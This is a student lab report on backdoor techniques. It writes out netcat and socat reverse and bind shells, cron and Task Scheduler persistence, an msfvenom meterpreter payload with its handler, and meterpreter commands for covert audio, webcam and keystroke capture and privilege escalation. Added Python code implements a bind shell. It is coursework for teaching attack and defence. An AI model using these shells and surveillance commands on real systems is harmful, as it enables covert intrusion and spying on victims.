2019-2020-2 20175321 Wuding Cheng "Network Countermeasures Technology" Exp2: Backdoor Principles and Practice
I. Experiment objectives
- Task 1: Use netcat to obtain a shell on the target host, started from cron.
- Task 2: Use socat to obtain a shell on the target host, started from a scheduled task.
- Task 3: Use MSF meterpreter (or other software) to generate an executable, transfer it to the target host with ncat or socat, run it, and obtain the host's shell.
- Task 4: Use MSF meterpreter (or other software) to capture audio, camera images and keystrokes on the target host, and attempt privilege escalation.
II. Basics
- Backdoor: a way of accessing a system that bypasses the normal authentication process and the normal access channel.
- Where a backdoor may exist:
  - compiler
  - operating system
  - firmware
  - application
- Backdoor workflow: the backdoor program is written → implanted into the target → made to evade anti-virus detection ("kill-free").
- Backdoor tools:
  - Netcat: a low-level tool that provides basic TCP/UDP data sending and receiving. It is usually combined with other tools, and it is in that combination that it acts as a backdoor.
  - socat: an enhanced version of nc. Its basic function is to create two bidirectional byte streams and transfer data between them; each argument is an address that represents one of the two endpoints. A "stream" is a flow of data, and since data can be of many different types, the command takes a number of options to define and describe the various kinds of streams.
  - Meterpreter: has powerful features, in particular its SOCKS proxy. Meterpreter is the killer feature of the Metasploit framework and is usually used as the payload of an overflow exploit: once the vulnerability is triggered, the payload returns a control channel to us. For example, when exploiting a vulnerability in a remote procedure call (RPC) service, choosing Meterpreter as the payload gives us a Meterpreter shell connected to the target system as soon as the vulnerability fires. Meterpreter is an extension module of the Metasploit Framework and can call on Metasploit's features to penetrate the target system more deeply; these features include anti-forensics, memory-only execution, password hash dumping, privilege escalation, and pivoting to attack further hosts.
III. Experiment content
1. Use netcat to obtain the host's shell, started from cron
1.1 Windows obtains a Linux shell
First run `ipconfig` on Windows to see its IP address.
After turning off the firewall, use ncat.exe to open a listener: `ncat.exe -l -p 5321`
On Kali, use the `-e` option to execute a shell and connect back to Windows: `nc 192.168.1.18 5321 -e /bin/sh`
Windows now has Kali's shell:
1.2 Linux obtains a Windows shell
On Kali, run `ifconfig` to view Kali's IP:
Use `nc -l -p 5321` to open a listener on Kali.
On Windows, use `ncat.exe -e cmd.exe 192.168.1.20 5321` to connect back to Kali.
Kali now has a Windows command prompt:
1.3 Starting from cron
Cron is the scheduled-task service under Linux. It wakes up every minute and executes the preset commands according to its configuration file.
Listen on port 5321 under Windows. On the Linux side, enter the command `crontab -e`, select 3 to enter the editor,
and add `21 * * * * /bin/netcat 192.168.1.18 5321 -e /bin/sh` on the last line, meaning that the command is executed at minute 21 of every hour.
At minute 21, Linux connects to Windows, and the listening Windows side receives the shell:
1.4 Data transfer with nc
Use `ncat.exe -l 5321` to listen on port 5321 under Windows, and use `nc 192.168.1.18 5321` on Kali to connect to port 5321 on Windows. Once the connection is established, the two sides can send data to each other.
2. Use socat to obtain the host's shell, started from a scheduled task
After downloading socat, open Computer Management → Task Scheduler → Create Task, fill in the task name, and create a new trigger.
Under Actions, choose the path of socat.exe as the program/script, and fill in `tcp-listen:5321 exec:cmd.exe,pty,stderr` in the "Add arguments" field.
This binds cmd.exe to port 5321 and redirects cmd.exe's stderr onto the same channel as stdout.
After creating the trigger, set its time; the other settings are left at their defaults.
You can see that the task has been created and is running.
When the trigger time is reached, the task runs automatically.
On Kali, enter `socat - tcp:192.168.0.102:5321`
to connect to port 5321 on the Windows host, and you get a Windows shell:
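The listening (bind) shell that the scheduled task runs, as an added example that is not part of the original report, replayed over loopback in Python: `serve_shell` does what `socat tcp-listen:PORT exec:cmd.exe,stderr` does on the Windows side (with `/bin/sh` standing in for cmd.exe, so it runs on Linux), and `bind_shell_demo` does what `socat - tcp:HOST:PORT` does on Kali. The same command set is run once with stderr merged into the channel and once without, to show what the `stderr` option buys you: without it the shell's error messages never reach the attacker. Port and commands are constructed; `subprocess.DEVNULL` stands in for "stays on the victim's console".

```python
import socket
import subprocess
import threading


def serve_shell(srv, merge_stderr):
    """Victim side, as `socat tcp-listen:PORT exec:cmd.exe,stderr` (here /bin/sh instead of cmd.exe):
    wait for one client, then attach a shell's stdin/stdout (and optionally stderr) to that connection."""
    conn, _ = srv.accept()
    fd = conn.fileno()
    proc = subprocess.Popen(
        ["/bin/sh"],
        stdin=fd,
        stdout=fd,
        stderr=fd if merge_stderr else subprocess.DEVNULL,  # DEVNULL: errors stay off the channel
    )
    conn.close()   # the shell now owns the connection through its own descriptors
    proc.wait()


def bind_shell_demo(commands, merge_stderr=True, timeout=10):
    """Attacker side, as `socat - tcp:HOST:PORT`: connect, send commands, collect whatever comes back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))    # assumption: OS-chosen port instead of the report's 5321
    srv.listen(1)
    port = srv.getsockname()[1]
    victim = threading.Thread(target=serve_shell, args=(srv, merge_stderr), daemon=True)
    victim.start()                # on the real host this is Task Scheduler launching socat.exe
    client = socket.create_connection(("127.0.0.1", port))
    client.settimeout(timeout)
    client.sendall(("\n".join(commands) + "\nexit\n").encode())
    out = b""
    while True:
        chunk = client.recv(4096)
        if not chunk:             # shell exited, connection closed
            break
        out += chunk
    client.close()
    victim.join(timeout)
    srv.close()
    return out.decode(errors="replace")


# Constructed test commands: one line on stdout, one on stderr, one that makes the shell itself complain.
CHECKS = ["echo on-stdout", "echo on-stderr 1>&2", "no_such_command_xyz"]

if __name__ == "__main__":
    print("stderr merged (socat ...,stderr):\n" + bind_shell_demo(CHECKS))
    print("stderr not merged:\n" + bind_shell_demo(CHECKS, merge_stderr=False))
```

The difference matters in practice: with stderr left on the victim, a mistyped command produces no feedback at all on the Kali side, which is easy to mistake for a dead connection. Unlike the cron entry of 1.3, this task leaves a listening socket open on the Windows host, so `netstat -ano` on the victim shows it directly.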
3. Use MSF meterpreter to generate an executable, transfer it to the host with ncat or socat, run it, and obtain the host's shell
Kali attacks Win10. First execute the following on Kali: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 -f exe > Counter-Strike20175321.exe`
The IP address here is Kali's IP.
Under Windows, execute the command `ncat.exe -lv 5321 > Counter-Strike20175321.exe`
and watch the current connection status.
On Kali, use `nc 192.168.1.18 5321 < Counter-Strike20175321.exe`
to transfer the backdoor; when the transfer succeeds, the Windows cmd window shows the transfer information.
On Kali, run `msfconsole`
to enter the msf console and type:
```
use exploit/multi/handler            // use the listener module and set the payload
set payload windows/meterpreter/reverse_tcp   // the same payload used when generating the backdoor
set LHOST 192.168.1.20               // Kali's IP
set LPORT 5321                       // the same port as before
exploit
```
This starts the listener. Now run the backdoor program on Windows:
once the backdoor is run from cmd on Windows, Kali obtains a shell on the Windows host.
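The file transfer from section 3, with the integrity check that problems 1 and 3 in section IV call for, as an added example not in the original report: Python stands in for `ncat.exe -lv 5321 > file` (receiver) and `nc HOST 5321 < file` (sender) over loopback and compares SHA-256 digests of what was sent and what arrived. `stop_after` simulates a connection that drops mid-transfer, which is the case in which Windows refuses the truncated executable with "This app can't run on your PC". The payload is constructed (an MZ header plus filler, not a real executable) and the port is chosen by the OS.

```python
import hashlib
import socket
import threading

# Constructed stand-in for Counter-Strike20175321.exe: an MZ header plus filler bytes.
# Assumption: this is not a real executable, only something with a known size and digest.
PAYLOAD = b"MZ" + bytes(range(256)) * 64


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def receive_file(srv, sink, timeout):
    """Receiver, as `ncat.exe -lv PORT > file`: accept one connection and store everything until EOF."""
    conn, _ = srv.accept()
    conn.settimeout(timeout)
    while True:
        chunk = conn.recv(65536)
        if not chunk:          # peer closed: the only end-of-file signal a raw TCP transfer has
            break
        sink.extend(chunk)
    conn.close()


def send_file(host, port, data, stop_after=None):
    """Sender, as `nc HOST PORT < file`. stop_after=N simulates the link dropping after N bytes."""
    sock = socket.create_connection((host, port))
    sock.sendall(data if stop_after is None else data[:stop_after])
    sock.close()


def transfer_with_check(data, stop_after=None, timeout=10):
    """Run sender and receiver over loopback; return (received_bytes, digests_match)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))    # assumption: OS-chosen port instead of the report's 5321
    srv.listen(1)
    port = srv.getsockname()[1]
    sink = bytearray()
    rx = threading.Thread(target=receive_file, args=(srv, sink, timeout), daemon=True)
    rx.start()
    send_file("127.0.0.1", port, data, stop_after)
    rx.join(timeout)
    srv.close()
    received = bytes(sink)
    return received, sha256_hex(received) == sha256_hex(data)


if __name__ == "__main__":
    for stop in (None, 4096):
        got, ok = transfer_with_check(PAYLOAD, stop)
        print(f"sent {len(PAYLOAD)} bytes, received {len(got)}, sha256 match: {ok}")
```

On the real hosts, compare the digest on both sides before running the backdoor (`sha256sum` on Kali, `certutil -hashfile Counter-Strike20175321.exe SHA256` on Windows); a mismatch means re-send, which is the fix given for problem 3. One common reason the transfer appears to hang is that some netcat variants keep the connection open after stdin reaches EOF, so the receiving side never sees end-of-file; ncat's `--send-only` and, where supported, nc's `-q 1` close the connection once the file has been written.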
4. Use MSF meterpreter to capture audio, camera images and keystrokes on the target host, and attempt privilege escalation
4.1 Enter the `record_mic` command to record audio for a period of time; when recording finishes, the file is saved automatically to the output path shown:
4.2 Enter the `webcam_snap` command to take a photo with the camera; when it completes, the image is saved automatically to the output path shown and opened automatically.
4.3 Enter `keyscan_start`, then `keyscan_dump`, to capture and retrieve the target's keystrokes:
4.4 Enter the `screenshot` command to take a screenshot of the target's desktop.
4.5 Enter the `getsystem` command to attempt privilege escalation:
IV. Problems encountered in the experiment
1. File transfer with nc did not succeed
Cause: unknown.
Solution: none found.
2. The scheduled task did not start at the set time
Cause: in the task's Conditions tab, "Start the task only if the computer is on AC power" and "Stop if the computer switches to battery power" are checked by default.
Solution: plug in the power adapter, or uncheck these conditions.
3. "This app can't run on your PC"
Cause: the backdoor file transfer failed, so the file on Windows was not intact.
Solution: transfer it again.
V. Summary and experience
1. Answers to the basic questions
- (1) Give examples of ways a backdoor could possibly get into your system.
  - Through software obtained from unofficial websites.
- (2) Give examples of how a backdoor can be started (Windows and Linux).
  - Timed start (for example cron), start on boot/restart, and start when a program is run.
- (3) Which Meterpreter feature left the deepest impression on you?
  - Accessing the attacked machine's camera to steal images and audio without the user being aware.
- (4) How would you find out whether a backdoor has been installed on your system?
  - Turn on the firewall and anti-virus software, and do not give the program a chance.
2. Experiment experience
I did not think this experiment would take so much time, but because it involves different systems (machines) listening to each other and transferring data and files, all kinds of unexpected situations kept occurring. We need not only the patience to analyze and solve the problems one after another, but also the courage to redo things in order to understand their nature, and a pair of "sharp eyes". It really does train a person.